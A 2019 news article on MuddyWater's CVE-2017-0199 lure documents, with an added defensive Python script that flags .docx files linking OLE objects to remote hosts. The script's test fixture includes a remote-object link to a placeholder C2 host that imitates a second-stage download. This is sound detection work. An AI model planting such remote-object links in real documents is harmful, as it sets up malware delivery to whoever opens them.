7 June 2019

The MuddyWater APT group adds new attack vectors to its arsenal

Despite the recent exposure of some of its tools and strategies, the Iranian MuddyWater cyber-espionage group has continued to evolve its attack methods by supplementing its arsenal with two new exploits. Specifically, the group has been leveraging malicious documents and files to target telecommunications organizations and to impersonate government entities in Iraq, Pakistan, and Tajikistan, according to a report from the Israeli company ClearSky Cyber Security.

The threat actor has been carrying out attacks against its targets in two stages. The first stage involves lure documents designed to exploit a well-known remote code execution (RCE) vulnerability in Microsoft Office, CVE-2017-0199, while the second stage lets the attackers communicate with compromised servers to download an infected file.

The researchers said that this is the first time MuddyWater has used these two vectors in conjunction. They also added that the malicious documents were detected by only three anti-virus solutions. “This is in stark comparison to a previous attack we reported on, in which the documents were identified 32 times,” noted ClearSky.

Once the victim's machine is compromised, the malware tries to communicate with the attackers' C2 servers and, if the attempt fails, the victim is redirected to Wikipedia.

To exploit the CVE-2017-0199 flaw, MuddyWater uses two types of decoy documents: the first type makes use of error messages, while the second type exploits the vulnerability as soon as the document is opened by the victim.
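The lure documents described above rely on Office fetching a linked OLE object from a remote location when the file is opened. One cheap triage check a defender can run on incoming .docx attachments is to look for OLE-object relationships whose target is external. The script below is an added example, not code from the article or from ClearSky; the function names, the constructed in-memory sample documents and the placeholder URL `http://c2.example.invalid/stage2.doc` are all assumptions made for the demonstration. It is a heuristic: a hit means the document links to a remote object and deserves sandboxing, not that it is proven to exploit CVE-2017-0199, and RTF carriers are not covered.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List

# OOXML package-relationship namespace and the relationship type a Word
# document uses for an embedded or linked OLE object.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def external_ole_targets(docx_bytes: bytes) -> List[str]:
    """Return "<rels part>: <target>" for every OLE-object relationship whose
    TargetMode is External, i.e. an object Word would fetch from a remote
    location on open. Triage heuristic only: it does not prove the file is a
    CVE-2017-0199 exploit, and RTF carriers are not inspected here."""
    findings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                # TargetMode defaults to Internal when the attribute is absent.
                if (rel.get("Type") == OLE_TYPE
                        and rel.get("TargetMode", "Internal") == "External"):
                    findings.append(f"{name}: {rel.get('Target')}")
    return findings


def build_docx(document_rels: str) -> bytes:
    """Build a minimal, constructed .docx container (not a real Word file) whose
    word/_rels/document.xml.rels part is the given XML string."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


# Constructed sample: an ordinary document whose OLE object is stored inside the package.
BENIGN_RELS = f"""<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OLE_TYPE}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""

# Constructed sample: the OLE object is linked to a remote URL (placeholder host),
# the shape a CVE-2017-0199 lure takes in its OOXML form.
SUSPICIOUS_RELS = f"""<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OLE_TYPE}"
                Target="http://c2.example.invalid/stage2.doc" TargetMode="External"/>
</Relationships>"""


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspicious", SUSPICIOUS_RELS)):
        hits = external_ole_targets(build_docx(rels))
        print(f"{label}: {'FLAG ' + '; '.join(hits) if hits else 'no external OLE links'}")
```

To run it against a real attachment, pass the file's bytes to `external_ole_targets` instead of the constructed sample. Any external target is worth quarantining and detonating in a sandbox, since a legitimate business document rarely needs to pull an OLE object over the network.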

MuddyWater (aka Temp.Zagros, G0069 and SeedWorm) is a high-profile Advanced Persistent Threat (APT) actor believed to have ties to Iran. MuddyWater was first observed in 2017 and, while it is relatively new to the cyber-espionage scene, in the last nine months the group has been highly active, managing to compromise 131 victims in 30 organizations all over the world, from Russia to Saudi Arabia to North America.
